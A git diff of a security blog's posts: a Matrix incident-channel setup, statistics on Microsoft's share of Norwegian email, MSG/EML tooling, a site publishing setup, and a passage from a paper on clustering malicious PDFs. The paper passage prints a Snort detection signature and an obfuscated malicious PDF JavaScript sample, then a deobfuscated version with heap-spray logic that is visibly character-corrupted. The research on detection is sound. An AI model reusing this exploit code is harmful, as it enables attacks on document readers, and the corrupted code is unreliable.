* Have a disposable server infrastructure

This could have been a bit too much to ask for a couple of
years ago, but today there are at least two alternatives
satisfying the above requirements: Mattermost and the Matrix
ecosystem. For the remainder of this post I will focus on
how to establish an ad-hoc system with the tools provided by
the Matrix project.

## Setting Up An Out-of-Band Channel for Incident Handling with Matrix

Getting started takes three steps:

1. Establish a back-end server on Digital Ocean
2. Serve the Riot front-end website
3. Establish a recording capability with Matrix Recorder [2]

For the first two points, it is clever to use an approach
that can be easily reproduced and that provides exactly the
same, secure-by-default configuration each time. Due to this
the preferred method in this case is to manage the VPS,
which can be established on anything running Debian or
CentOS, with Ansible. There is a script available on Github,
known as matrix-docker-ansible-deploy [3]. The latter has
also been endorsed by the Matrix project [4]. Both 1 and 2
can be accomplished with ``matrix-docker-ansible-deploy``.

So let's get started.

### Basic DNS-service

For this example I created a domain on namesilo.com and
pointed that to ``(ns1|ns2|ns3).digitalocean.com``. It would
be unfortunate for the continuity of the service if the
domain was taken offline or redirected somewhere, but due to
the end-to-end encryption in Matrix it would not compromise
the content of the conversations. Now that Digital Ocean has
control of the primary domain, make sure to add the
following before continuing:

    Type  Hostname               Value                       TTL
    A     <domain>               <ip>                        600
    A     riot.<domain>          <ip>                        600
    A     matrix.<domain>        <ip>                        600
    SRV   _matrix._tcp.<domain>  10 0 8448 matrix.<domain>   600

This can take some time to propagate, so make sure that the
DNS infrastructure is readily resolvable before you continue
deploying the services.

### Configure

Make sure to grab a copy of the current
``matrix-docker-ansible-deploy`` by running:

    git clone https://github.com/spantaleev/matrix-docker-ansible-deploy.git

Create the following files:

    inventory/host_vars/matrix.<domain>/vars.yml
    inventory/hosts

``vars.yml`` should look like this:

    host_specific_matrix_ssl_support_email: <your-contact-email>
    host_specific_hostname_identity: <domain>
    matrix_coturn_turn_static_auth_secret: "<run pwgen -s 64 1>"
    matrix_synapse_macaroon_secret_key: "<run pwgen -s 64 1>"

The Ansible ``hosts`` file should be formatted like the following:

    all:
      children:
        matrix-servers:
          hosts:
            matrix.<domain>:
              ansible_user: root

### Deploy and Execute

Now that your configuration files and server are ready, you
can start deploying the Matrix Synapse server and start
serving the Riot HTML/JS client.

First deploy the services (Riot and Matrix Synapse) by running:

    ansible-playbook -i inventory/hosts setup.yml --tags=setup-main

When that completes successfully, you can start the services by:

    ansible-playbook -i inventory/hosts setup.yml --tags=start

After starting the services, the Riot web interface is
available on ``https://riot.<domain>``, where metadata is
protected by a Let's Encrypt certificate.

The two primary endpoints you now have exposed to the WWW
are:

* The Matrix API, which runs at https://matrix.<domain>
* The Riot UI, which runs at https://riot.<domain>

Going to ``https://riot.<domain>`` brings you to the Riot
logon screen.

### Adding Users

Registration is disabled by default on the server, so new
users can be added by the following command:

    ansible-playbook -i inventory/hosts setup.yml \
        --tags=register-user \
        --extra-vars='username=<first user>
                      password=<some password>
                      admin=(yes|no)'

It is better to use pseudonyms on such a platform to make
sure no information can be traced to a specific individual
not involved in the case. Each user needs to verify his
private key fingerprint with the other participants.

### Vital Steps to Take as an Administrator

When using multiple servers, it is necessary to create a
``#control`` channel that serves as a fallback if a server
hosting a room goes down.

### Setup Matrix Recorder

To make sure that all communications are stored for
traceability, make sure to install the Matrix Recorder
(MR). MR should be installed locally and _not_ on the Matrix
server.

    git clone https://gitlab.com/argit/matrix-recorder.git
    cd matrix-recorder/
    npm install

To execute the recorder, run the following. The first time
you will be asked to enter the login credentials of the
user.

    $ node matrix-recorder.js <case-folder>
    Loading olm...
    Your homeserver (give full URL): https://matrix.<domain>
    Your username at the homeserver: <username>
    Your password at the homeserver: <password>
    No of items to retrieve for initial sync: 1000
    [...]

View messages as HTML by running the Matrix Recorder
conversion script:

    node recorder-to-html.js <case-folder>

### Controlling Logins

Access monitoring can be done in the console by
e.g. ``tail -f /matrix/synapse/run/homeserver.log``.

### The Power of Disposability

At some point you have finished the information
exchange. The beauty of this setup is that it can now be
safely deleted from the Digital Ocean droplet console.

[1] James Comey and 60 minutes: https://www.cbsnews.com/news/fbi-director-james-comey-on-threat-of-isis-cybercrime/
[2] Matrix Recorder: https://matrix.org/docs/projects/other/matrix-recorder.html
[3] matrix-docker-ansible-deploy: https://github.com/spantaleev/matrix-docker-ansible-deploy
[4] Matrix project endorsement: https://matrix.org/blog/2018/06/01/this-week-in-matrix-2018-06-01/

159
data/microsoft-dominating-email.md
Normal file

@@ -0,0 +1,159 @@

## Key Takeaways

* While market dominance was formerly an issue discussed for
  operating systems, the modern equivalent occurs in the
  form of cloud services, primarily from Microsoft, Amazon
  and Google.

* Data from the Norwegian business registry mapped to email
  records shows that Microsoft Office 365 has become a
  dominating force amongst Norwegian private businesses and
  61% of the government.

* Microsoft being a significant actor for email indicates
  that Norwegian organisations are putting a lot more faith
  in Microsoft. Today email as a service is bundled with
  direct messaging and wikis.

## Introduction

In 2003 Dan Geer, Bruce Schneier and others wrote a paper
named "How the Dominance of Microsoft's Products Poses a
Risk to Security". It eventually cost Geer his job at
@stake.

The paper revolves around Microsoft's dominance in operating
systems, and Geer has later given Microsoft credit for a
better approach to security [2].

In this article I am not going to reiterate the points made
by Geer et al. I think these are perfectly valid and easily
transferrable to the current landscape. The whole paper is
worth reading, but I'd like to highlight one part:

> Governments, and perhaps only governments, are in leadership
> positions to affect how infrastructures develop. By enforcing
> diversity of platform to thereby blunt the monoculture risk,
> governments will reap a side benefit of increased market
> reliance on interoperability, which is the only foundation for
> effective incremental competition and the only weapon against
> end-user lock-in. A requirement that no operating system be more
> than 50% of the installed based in a critical industry or in a
> government would moot monoculture risk. Other branches to the
> risk diversification tree can be foliated to a considerable
> degree, but the trunk of that tree on which they hang is a total
> prohibition of monoculture coupled to a requirement of
> standards-based interoperability.

Azure is Windows in 2021. The walled gardens are somewhat
redefined - but they are there in a similar fashion as
Windows was in 2003. The Microsoft monopoly is technically
broken, and there are now options from Amazon, Google and
even Apple, but I would argue the monoculture is still
present in shared approaches, infrastructure and concepts.

I decided to have a closer look at the distribution from a
representative dataset provided by an authoritative source
in Norway; the business registry.

## Taking a Close Look at The Data

In Norway we have a public registry of organisations. This
registry is categorised by standardised sector codes
(typically "government", "private" and so on). Using the
JSON data provided by brreg.no, a list of websites can be
extracted:

1. Retrieve the organisation list from brreg.no [1]

```
curl https://data.brreg.no/enhetsregisteret/api/enheter/lastned > enheter.gz
gzip -d enheter.gz
```

2. Reshape the JSON data by website URL, sector and business code.

```
cat enheter |
  jq '[.[] | select(.hjemmeside != null) | {url:.hjemmeside, code:.naeringskode1.kode, sector:.institusjonellSektorkode.kode}]' > webpages.txt
```

3. Based on the URL, add the primary domain and resolve its MX
   record and the MX primary domain to each JSON entity (a rough
   sketch of this step is shown after this list).

4. Using the JSON-file generated above, populate the following
   JSON dictionary. This is also a rough categorisation based on
   the standard provided by Statistics Norway (I'm sure it could
   be improved) [4]:

```
{
  "government":{"codes": [6100,6500,1110,1120], "total":0, "counts":{}},
  "municipals":{"codes": [1510,4900,1520], "total":0, "counts":{}},
  "finance":{"codes": [3200,3500,3600,4300,3900,4100,4500,4900,5500,5700,4900,7000], "total":0, "counts":{}},
  "private":{"codes": [4500,4900,2100,2300,2500], "total":0, "counts":{}}
}
```

5. Generate CSV output based on each sector grouping above.

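As mentioned in step 3, MX resolution was not shown above. As
a rough sketch (assuming the ``dnspython`` package and the
``webpages.txt`` file from step 2), it could look like this;
the naive primary-domain handling is just for illustration:

```
import json

import dns.resolver  # pip install dnspython


def mx_domain(domain):
    """Return the primary domain of the highest-priority MX record."""
    answers = dns.resolver.resolve(domain, "MX")
    exchange = str(min(answers, key=lambda r: r.preference).exchange)
    # Naive: keep the last two labels of the exchange name.
    return ".".join(exchange.rstrip(".").split(".")[-2:])


entries = json.load(open("webpages.txt"))
for entry in entries:
    domain = entry["url"].split("//")[-1].split("/")[0]
    domain = domain[4:] if domain.startswith("www.") else domain
    try:
        entry["mx"] = mx_domain(domain)
    except Exception:
        entry["mx"] = None
```
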
## The Result

The top vendor was, not surprisingly, Microsoft's
outlook.com. Of the 120k sites, 98k resolved an MX
record. Of these I will give an outlook.com summary as
follows, as it would seem this is the dominating actor in
all categories:

* In government 61% are O365 users (1420/2317)

* For municipals, the share is 55% (688/1247)

* For the diverse financial grouping, 21% use O365 (4836/23125)

* For the diverse private companies 38% use O365 (14615/38129)

Of the 98k sites, Microsoft runs the email service for 21559
organisations. For comparison, Google MX domains account for
about 5500.

While the above is directly a measurement of who delivers
email services, it also indicates that these organisations
rely on other services, such as internal wikis and direct
messaging.

An overview of the top 10 vendors is shown below.

![](static/img/data/mx_domains.png)

## Sources of Errors

Even though I believe the statistics above are
representative, they have some possible sources of error:

1. The organisation isn't listed with a URL in the
   organisation registry, or it uses a domain not associated
   with the primary domain of its web address

2. The organisation uses an SMTP proxy

3. The organisation has an inactive SMTP record

I found that there are more than 1 million listed
organisations in the brreg.no registry and 120k websites in
the JSON data provided. This means this dataset represents
at most 12% of the companies listed.

Also, email doesn't represent a diverse infrastructure, but
I believe it is an indicator of the current trends also for
other cloud services in e.g. Azure, Google Compute Engine
and so on.

[1] CyberInsecurity: The Cost of Monopoly, Geer et al, 2003 - https://cryptome.org/cyberinsecurity.htm
[2] Cybersecurity as Realpolitik by Dan Geer presented at Black Hat USA 2014: https://www.youtube.com/watch?v=nT-TGvYOBpI
[3] https://data.brreg.no/enhetsregisteret/api/enheter/lastned
[4] https://www.ssb.no/klass/klassifikasjoner/39

58
data/msg-eml.md
Normal file

@@ -0,0 +1,58 @@

Thought I’d share a neat little script-combo if you do your
email analysis on Linux systems, or do automation. For the
task you’ll need msgconvert.pl [1] and ripmime [2].

MSG files are used by Microsoft Outlook, and are the natural
fit in regard to malicious messages in organizations running
Microsoft products. For reference you can find the
specification for the Outlook Item File Format here.

In this part you will require a file from Outlook, which you
can acquire by selecting a message and dragging it to the
desktop or a new message. If you don’t do Outlook, you can
just google for one [3].

    msgconvert.pl <message>.msg
    ripmime -i <message>.mime

The above will first convert the MSG file to a MIME
file. The latter command will make sure to extract the
objects in it, such as binary files or documents. The text
files contain the content of the email and will be named
something like: textfile0

If you need the headers you will find them at the top of the
mime-file.

Now to EML-files, which you will also often find when
exporting email messages. EML is really just short for
“E-mail”. In OS X Mail, Outlook Express, Thunderbird (and
others) you are typically presented with EML/MIME-formatted
documents, and it’s just a document which complies with RFC
822 [4]. EML-files are easier to work on since you can open
them in a text editor and read the essential information
straight away.

So what does that mean in regard to ripmime? It really just
means that instead of calling the output from msgconvert.pl
<message>.mime, you can name the file <message>.eml. In
commands:

    ripmime -i <message>.eml

The above will output your mime parts.

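If you prefer to stay in Python for automation, the standard
library can do roughly the same job on an EML file. A
minimal sketch (the filename is just an example):

    # Minimal sketch: print basic headers and dump attachments
    # from an EML file using only the Python standard library.
    import email
    from email import policy

    with open("message.eml", "rb") as handle:
        message = email.message_from_binary_file(handle, policy=policy.default)

    print(message["From"], message["Subject"])

    for part in message.walk():
        filename = part.get_filename()
        if filename:
            with open(filename, "wb") as out:
                out.write(part.get_payload(decode=True))
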
## OS X Specifics

You may want to do the above on an OS X system as well. For
this you can install ripmime via Homebrew [5].

If you are exporting an EML from Apple Mail you may do so
the same way as in Outlook: Just drag it where you want it.

[1] https://www.matijs.net/software/msgconv/
[2] https://www.pldaniels.com/ripmime/
[3] https://www.google.com/search?q=filetype:msg&oq=filetype:msg#q=filetype:msg+outlook
[4] https://tools.ietf.org/html/rfc822
[5] https://brew.sh/index_nb

70
data/new-format.md
Normal file

@@ -0,0 +1,70 @@

After being off the HTML grid for a while, I have been using
Hugo as a static site generator for Gopher. I grew tired of
the upgrade and complexity issues with publishing new
content. It all culminated with Hugo refusing to generate
the site at all after the last update.

Because of the Hugo failure I needed to create a new
strategy, and not being willing to change to another complex
generator system I went hunting for something else.

I am happy with my current backend publishing setup, which
uses git and a post-receive hook:

    pwd=$(pwd)
    if test -z "${pwd##*.git}"
    then repo="$pwd"
    else repo="$pwd/.git"
    fi

    git --work-tree=~/secdiary/content --git-dir=~/secdiary/content.git checkout -f
    cd ~/secdiary
    rm -r /var/www/secdiary.com/*
    rm -r /var/gopher/*
    cp -R html/* /var/www/secdiary.com/
    cp -R gopher/* /var/gopher/

    cp ~/twtxt/content/twtxt.txt /var/www/secdiary.com/

    echo "\nBuild: " >> /var/gopher/index.gph
    git --git-dir=~/secdiary/content.git log -1 --pretty="%H%n%ci" >> /var/gopher/index.gph

I also publish twtxt messages in a similar way. My twtxt
config looks like the following:

    [twtxt]
    nick = tommy
    twtfile = ~/twtxt/twtxt.txt
    twturl = http://secdiary.com
    disclose_identity = False
    character_limit = 140
    character_warning = 140
    post_tweet_hook = "cd ~/twtxt/ && git pull && git add twtxt.txt && git commit -m 'added new tweet' && git push"

In addition to my twtxt feed, I am present on Mastodon,
which led me to Solene's static site generator cl-yag
[1,2]. I decided to generate the site client-side for now,
but in the future I'll likely move this to the server for
less complex workflows on my workstations. This also fits me
well since I'll be moving more of my workflow to OpenBSD in
the coming months.

The layout of my new site is more or less shamelessly stolen
from Solene as well. I plan to customize that to my liking
as we go.

And with that I am back in the WWW space, however in a
limited format. I am currently reviewing my 50 current posts
and will assess what can be of use in the future. This will
involve some rewriting as well, since this space will be
text-only out of respect for your time.

I also enabled TLS on the site for those that would like to
browse privately, as opposed to my current Gopher setup. The
latter you may find on ``gopher://secdiary.com``.

Feel free to reach out to me in the Fediverse. I'm there as
@tommy@cybsec.network.

[1] https://dataswamp.org/\~solene/2018-10-12-cl-yag-20181012.html
[2] git://bitreich.org/cl-yag

792
data/novel-pdf-detection.md
Normal file

@@ -0,0 +1,792 @@

For some time now the Portable Document Format standard has
been a considerable risk in regard to corporate as well as
private information security concerns. Some work has been
done to classify PDF documents as malicious or benign, but
not as much when it comes to clustering the malicious
documents by the techniques used. Such clustering would
provide insight, in automated analysis, into how
sophisticated an attack is and who staged it. A 100,000
unique PDF dataset was supplied by the Shadowserver
foundation. Analysis of experiment results showed that 97%
of the documents contained javascripts. This and other
sources revealed that most exploits are delivered through
such, or similar, object types. Based on that, javascript
object labeling gets a thorough focus in the paper.

The scope of the paper is limited to extending the
attribution research already done in regard to PDF
documents, so that a feature vector may be used in labeling
a given (or a batch of) PDF to a relevant cluster. That as
an attempt to recognize different techniques and threat
agents.

> Javascript is currently one of the most exploited PDF
> objects. How can the PDF feature vector be extended to
> include a javascript subvector correctly describing the
> technique/style, sophistication and similarity to previous
> malicious PDF documents. How does it relate to the term
> digital evidence?
> — Problem statement

The problem statement considers the coding styles and
obfuscation techniques used and the related sophistication
in the coding style. Last but most important, the statement
involves how the current PDF document measures up to others
previously labeled. These are all essential problems when it
comes to automated data mining and clustering.

### A. Related Work

Proposed solutions for malicious contra benign
classification of PDF documents have been explicitly
documented in several papers. Classification using support
vector machines (SVM) was handled by Jarle Kittilsen in his
recent Master's thesis [1].

Further, the author of this paper in his bachelor's thesis
[2] investigated the possibility of detecting obfuscated
malware by analyzing HTTP data traffic known to contain
malware. In that regard, the findings were implemented,
designed and tested in Snort. Some of the detection
techniques will be used as a fundament for labeling in this
paper.

Even though much good work has been done in the area of
analyzing malicious PDF documents, many of the resulting
tools are based on manual analysis. To be mentioned is
Didier Stevens, who developed several practical tools, such
as the PDF parser and PDFid. These were not only tools, but
the beginning of a structured way of looking at suspicious
objects in PDF documents as well. To be credited as well is
Paul Baccas at Sophos, who did considerable work on
characterizing malicious contra benign PDF documents [3].

The paper will be doing research into the feature, or more
precisely the javascript subvector, of malicious PDF
documents. To be able to determine an effective vector (in
this experimental phase), it is essential that the dataset
is filtered, meaning that the files must be malicious. As
Kittilsen has done in regard to PDF documents, Al-Tharwa et
al. [2] have done interesting work to detect malicious
javascript in browsers.

## Background
### A.1. The Feature Vector in Support of Digital Evidence

Carrier and Spafford defined "digital evidence" as any
digital data that contains reliable information that
supports or refutes a hypothesis about the incident
[7]. Formally, the investigation process consists of five
parts and is specially crafted for maintaining evidence
integrity, the order of volatility (OOV) and the chain of
custody. This all leads up to the term forensic soundness.

The investigation process consists of five phases. Note the
identification and analysis phase.

![Fig. 1: The investigation process. The investigation
process consists of five phases [9]. Note the identification
and analysis
phase](/images/2015/02/Theinvestigationprocess-e1380485641223.png)

In this paper, forensic soundness is a notion previously
defined [10] as meaning: no alteration of source data has
occurred. Traditionally this means that every bit of data is
copied and no data added. The previous paper stated two
elementary questions:

* Can one trust the host where the data is collected from?
* Does the information correlate with other data?

When it comes to malicious documents, they are typically
collected in two places:

1. In the security monitoring logging, the pre-event phase
2. When an incident has occurred and as part of the reaction to an
   incident (the collection phase)

Now, the ten thousand dollar question: When a malicious
document gets executed on the computer, how is it possible
to get indications that alteration of evidence has occurred?
The answer is potentially the first collection point, the
pre-event logging.

In many cases, especially considering targeted attacks, it
is not possible to state a PDF document as malicious in the
pre-event phase. The reason for this is often the way the
threat agent crafts his attack to evade the security
mechanisms in the target using collected intelligence. Most
systems, in accordance with local legislation, should then
delete the content data. A proposition though is to store
the feature vector.

The reasoning behind storing a feature vector is quite
simple: When storing hashes, object counts and the
javascript subvector, which we will return to later in the
paper, it will be possible to indicate if the document
features have changed. On the other side there is no
identifiable data invading privacy.

It is reasonable to argue that the measure of how similar
one PDF document is to another is also the measure of how
forensically sound the evidence collected in a post-event
phase is. How likely it is that the document acquired in the
collection phase is the same as the one in the pre-phase is
decided by the characteristics supplied by the feature
vectors of both. Further, the feature vector should be as
rich and relevant as possible.

![Fig. 2: Correlation by using the feature vector of the PDF
document. Illustration of a possible pre/post incident
scenario](/images/2015/02/Preandpost.png)

### A.2. Identification as an Extension of Similarity

The notion of similarity largely relates to the feature
vector: How is it possible, in large quantities of data, to
tell if a new PDF document carries characteristics similar
to others in a larger dataset?

In his work with semantic similarity and preserving hashing,
M. Pittalis [11] defined similarity from the Merriam-Webster
dictionary:

> Similarity: The existance of comparable aspect between two
> elements
> – Merriam-Webster Dictionary

The measure of similarity is important in regard to
clustering or grouping the documents. When clustering
datasets the procedure is usually in six steps; finding the
similarity measure is step 2.

1. Feature selection
2. Proximity/similarity measure
3. Clustering criterion
4. Clustering algorithm
5. Validation
6. Interpretation

In this paper the k-means unsupervised learning clustering
algorithm was considered. This simple algorithm groups n
observations into k clusters [22]. Each observation relates
to the cluster with the nearest mean.

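As an illustration of the clustering step, the following is
a minimal sketch (not from the original experiment) of how
k-means could be applied to already extracted PDF feature
vectors with scikit-learn; the feature columns are
placeholders:

    # Minimal sketch: cluster PDF feature vectors with k-means.
    # Each row is one document, each column one feature, e.g.
    # [object count, /JavaScript count, eval() count, max string length].
    import numpy as np
    from sklearn.cluster import KMeans

    features = np.array([[12, 1, 4, 1024],
                         [11, 1, 3,  980],
                         [45, 0, 0,   64],
                         [44, 0, 0,   70]])

    model = KMeans(n_clusters=2, n_init=10, random_state=0).fit(features)
    print(model.labels_)  # cluster membership per document
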
Now, as will be seen over the next two sections, work done
on the subject mostly misses out on giving a valid
similarity measure when it comes to classifying PDF
documents as anything other than malicious or benign. So, to
be able to cluster the PDF documents the feature vector will
need a revision.

As Pittalis introduced the concept of similarity, it is
important to define one more term: identification. According
to the American Heritage Dictionary, identification is:

> Proof or Evidence of Identity.
> — The American Heritage Dictionary

In our context this means being able to identify a PDF
document and attribute it to e.g. a certain type of botnet
or, perhaps more correctly, a coding or obfuscation
technique. In an ideal state this will give an indication of
which threat agent is behind the attack. This is something
that has not been researched extensively in regard to PDF
documents earlier.

### C. The Portable Document Format

When it comes to the feature vector of the portable document
format (PDF), it is reasonable to have a look at how PDF
documents are structured. The PDF consists of objects, and
each object is of a certain type. As much research has been
done on the topic previously, the format itself will not be
treated any further in this paper [12].

![A simplified illustration of the portable document format](/images/2015/02/ObjectdescriptionPDF-2.png)

When considering malicious PDF documents, relevant
statistics have shown the following distribution of resource
objects:

**Known Malicious Datasets Objects** A table showing a
number of interesting and selected features in malicious
seen against clean PDF documents. Baccas used two datasets,
where one indicated slightly different results.

| Dataset                                               | Object Type  | Clean (%) | Malicious (%) |
|-------------------------------------------------------|--------------|-----------|---------------|
| The Shadowserver 100k PDF malicious dataset           | /JavaScript  | NA        | 97%           |
| Paul Baccas' Sophos 130k malicious/benign dataset [3] | /JavaScript  | 2%        | 94%           |
|                                                       | /RichMedia   | 0%        | 0,26%         |
|                                                       | /FlateDecode | 89%       | 77%           |
|                                                       | /Encrypt     | 0,91%     | 10,81%        |

What can be seen from the table above is that when it comes
to the distribution of objects in malicious files, most of
them contain javascript. This makes it very hard to
distinguish and find the similarity between the documents
without considering a javascript subvector. The author would
argue that this makes it a requirement for a javascript
subvector to be included in the PDF feature vector to make
it valid. In previous work, where the aim has been to
distinguish between malicious and benign, this has not been
an issue.

### D. Closing in on the Core: The PDF Javascript Feature Subvector

Javascript is a client-side scripting language primarily offering greater interactivity with webpages. Specifically, javascript is not a compiled language, is weakly typed [4] and has first-class functions [5]. For rapid development these features give great advantages; from a security perspective they are problematic. The following is a Snort signature to detect a javascript "unescape" obfuscation technique [2] (we will return to the concept of obfuscation later on):

    alert tcp any any -> any any (msg:"Obfuscated unescape"; sid: 1337003; content:"replace"; pcre:"/u.{0,2}n.{0,2}e.{0,2}s.{0,2}c.{0,2}a.{0,2}p.{0,1}e' ?.replace (/";rev:4;)

Traditionally javascript is integrated as part of a browser. Seen from a security perspective, this opens for what is commonly known as client-side attacks. More formally: javascript enables programmatic access to computational objects within a host environment. This is complicated by the fact that javascript comes in different flavors, making general parsing and evaluation complex [6], as may be seen from the above signature. The flavors are often specific to the application. Today most browsers are becoming more aligned due to the requirements of interoperability. Some applications, such as the widely deployed Adobe Reader, have some extended functionality though, which we will be focusing on in this paper.

Even though javascript may pose challenges to security, it is important to realize that this is due to complexity. Javascript (which is implemented through SpiderMonkey in Mozilla products [18], and in Adobe Reader as well) builds on a standard named ECMA-262. ECMA is a standardization organization for Information and Communication Technology (ICT) and Consumer Electronics (CE) [17]. Thus, javascript is built from the ECMAScript scripting language standard. To fully understand which functions are essential in regard to malicious javascripts, this paper will rely on the ECMAScript Language Specification [19] combined with expert knowledge.

### E. Introducing Obfuscation

Harawa et al. [8] describe javascript obfuscation by six elements:

* Identifier reassignment or randomization
* Block randomization
* White space and comment randomization
* Strings encoding
* String splitting
* Integer obfuscation

Further, Kittilsen [1] documented a javascript feature vector which states the following functions as potentially malicious: [function, eval_length, max_string, stringcount, replace, substring, eval, fromCharCode]. Even though his confusion matrix shows good results, there are some problems when it comes to evaluating these as-is: such characters are usually obfuscated. The following is an example from sample ``SHA256:d3874cf113fa6b43e7f6e2c438bd500edea5cae7901e2bf921b9d0d2bf081201``:

if((String+'').substr(1,4)==='unct'){e="".indexOf;}c='var _l1="4c206f5783eb9d;pnwAy()utio{.VsSg',h<+I}*/DkR%x-W[]mCj^?:LBKQYEUqFM';l='l';e=e()[((2+3)?'e'+'v':"")+"a"+l];s=[];a='pus'+'h';z=c's'+"ubstr" [1];sa [2];z=c's'+"ubstr" [3];sa [2];z=c['s'+"ubstr"] [...]e(s.join(""));}

The above example tells an interesting story about the attacker's awareness of complexity. In respect to Kittilsen's javascript feature vector, the above would yield the following result: [0,x,x,x,0,0,0,0] (considerable results on the second to fourth, plus one count if we shorten substring to substr); in other words, the features are to be found in the embedded, obfuscated javascript, but not in clear text. When it comes to eval_length, max_string and string_count, we will return to those later in the paper.

Deobfuscated, the script would look like:

var _l1="[...]";_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length&4)_l6l='0';return parsetnt(_l6,10);function _l7(_l8,_l9){while(_l8.length+2&_l9)_l8l=_l8;return _l8.substring(0,_l9I2);function _t0(_t1){_t1=unescape(_t1);rote}a*=_t1.length+2;da*/ote=unescape('Du9090');spray=_l7(da*/ote,0k2000Rrote}a*);lok%hee=_t1lspray;lok%hee=_l7(lok%hee,524098);for(i=0; i & 400; ill)_l4xi-=lok%hee.substr(0,lok%hee.lengthR1)lda*/ote;;function _t2(_t1,len){while(_t1.length&len)_t1l=_t1;return _t1.substring(0,len);function _t3(_t1){ret='';for(i=0;i&_t1.length;il=2){b=_t1.substr(i,2);c=parsetnt(b,16);retl=String.froW[har[ode(c);;return ret;function _]i1(_t1,_t4){_t5='';for(_t6=0;_t6&_t1.length;_t6ll){_l9=_t4.length;_t7=_t1.char[odeAt(_t6);_t8=_t4.char[odeAt(_t6D_l9);_t5l=String.froW[har[ode(_t7m_t8);;return _t5;function _t9(_t6){_]0=_t6.toString(16);_]1=_]0.length;_t5=(_]1D2)C'0'l_]0j_]0;return _t5;function _]2(_t1){_t5='';for(_t6=0;_t6&_t1.length;_t6l=2){_t5l='Du';_t5l=_t9(_t1.char[odeAt(_t6l1));_t5l=_t9(_t1.char[odeAt(_t6));return _t5;function _]3(){_]4=_l5();if(_]4&9000){_]5='oluAS]ggg*pu^4?:IIIIIwAAAA?AAAAAAAAAAAALAAAAAAAAfhaASiAgBA98Kt?:';_]6=_l1;_]7=_t3(_]6);else{_]5='*?lAS]iLhKp9fo?:IIIIIwAAAA?AAAAAAAAAAAALAAAAAAAABk[ASiAgBAIfK4?:';_]6=_l2;_]7=_t3(_]6);_]8='SQ*YA}ggAA??';_]9=_t2('LQE?',10984);_ll0='LLcAAAK}AAKAAAAwtAAAALK}AAKAAAA?AAAAAwK}AAKAAAA?AAAA?gK}AAKAAAA?AAAAKLKKAAKAAAAtAAAAEwKKAAKAAAAwtAAAQAK}AUwAAA[StAAAAAAAAAAU}A]IIIII';_ll1=_]8l_]9l_ll0l_]5;_ll2=_]i1(_]7,'');if(_ll2.lengthD2)_ll2l=unescape('D00');_ll3=_]2(_ll2);with({*j_ll3;)_t0(*);Ywe123.rawValue=_ll1;_]3();

Which, through the simple Python javascript feature vector generator (appendix 1), yields:

    ['function: 9', 'eval_length: x', 'max_string: x', 'stringcount: x', 'replace: 1', 'substring|substr: 4', 'eval: 0', 'fromCharCode: 0']

Harawa et al.'s six elements of javascript obfuscation are probably a better, or at least a necessary supplemental, approach to Kittilsen's work.

There is a notable difference between deobfuscation and detecting obfuscation techniques. The difference lies in the depth of insight one might gain: actually deobfuscating a javascript reveals completely different code, while the obfuscation routines may be based on a generic obfuscator routine used by several threat agents. This is much like the issue of packers in regard to executables [23].

This section has shown the difficulties of balancing deobfuscation, for a more detailed coding-style analysis, against a less specific feature vector based on abstract obfuscation detection.

## Extracting and Analysing a PDF Feature Vector

### A. Deobfuscation - Emerging Intentions

Usually the most pressing questions when an incident involving a PDF document occurs are: who did it, and what were his intentions? This is also a consideration when further evolving the PDF feature vector. The next figure shows a model describing three groups of threat agents, where one usually stands out. For instance, if a Stuxnet-scale attack [24] involving a PDF document is perceived, it will be associated with a cluster containing "group 1" entities.

While Al-Tharwa et al. [2] argue that there is no need for deobfuscation in regard to classification, deobfuscation is an important step in regard to finding a distinct feature vector. The issue is that in most situations it isn't good enough to tell whether a document is malicious; one also needs to know by whom, and what, where and how it was created. In regard to being defined as valid digital evidence, a rich feature vector (in addition to the network on-the-fly hash sum) is part of the telling. The latter also becomes relevant when it comes to large quantities of data, where an analyst is not capable of manually analyzing and identifying hundreds to tens of thousands of PDF documents each day.

![Fig. 4: The threat agent model. A model describing three groups of attackers. These are necessary to filter and detect in the collection phase](/images/2015/02/threat-agent-model.png)

### B. Technical Problems During Deobfuscation

Normally most javascript engines, such as Mozilla's Spidermonkey [15], Google V8 [16] and others, tend to be javascript libraries for browsers and miss some basic functionality in regard to Adobe Reader, which is the most used PDF reader. These engines are most often used for dynamic analysis of javascripts and are a prerequisite for being able to completely deobfuscate javascripts.

To prove the concepts of this article, a static Python feature vector generator engine based on a rewritten version of the Jsunpack-n [14] project is used. The application used in this paper provides a vector-based interpretation of the static script, meaning it is not run dynamically.

Reliably detecting malicious PDF documents is a challenge due to the obfuscation routines often used. This makes it necessary to perform some kind of deobfuscation to reveal more functionality. Even if one managed to deobfuscate the script once, there may be several rounds more before it is in clear text. This was a challenge not solvable within the scope of this article.

Due to parsing errors, under half of the Shadowserver 100k dataset was processed by the custom Jsunpack-n module.

### C. Introducing Two Techniques: Feature Vector Inversion and Outer Loop Obfuscation Variable Computation

As has been well documented so far in the paper, it is more or less impossible to completely automate a deobfuscation process for the PDF format. Obfuscation leaves many distinct characteristics though, so the threat agent on the other hand must be careful not to trigger anomaly alarms. There is a balance. This part of the article introduces two novel techniques, proposed applied to the javascript subvector to improve its reliability.

#### C.1. Outer Loop Obfuscation Variable Computation (OLOVC)

When the threat agent implements obfuscation, one of his weaknesses is being detected by that very use of obfuscation. When it comes to PDF documents, using javascript alone is a trigger. Now, the threat agent is probably using every trick in the book, meaning the six elements of javascript obfuscation [8]. The job of an analyst in such a matter will be to predict new obfuscation attempts and implement anomaly alerts using the extended PDF feature vector.

Throughout this paper we will name this technique "Outer Loop Obfuscation Variable Computation". The term "outer loop" most often refers to round zero, or the first of the deobfuscation routines. Variable computation is, as its name states, a matter of computing the original javascript variable. As we have seen, this may be done either by deobfuscating the script as a whole, including its near-impossible-for-automation complexity, or by using the original obfuscated data. We will have a further look at the latter option.

Take for instance this excerpt from the "Introducing Obfuscation" section:

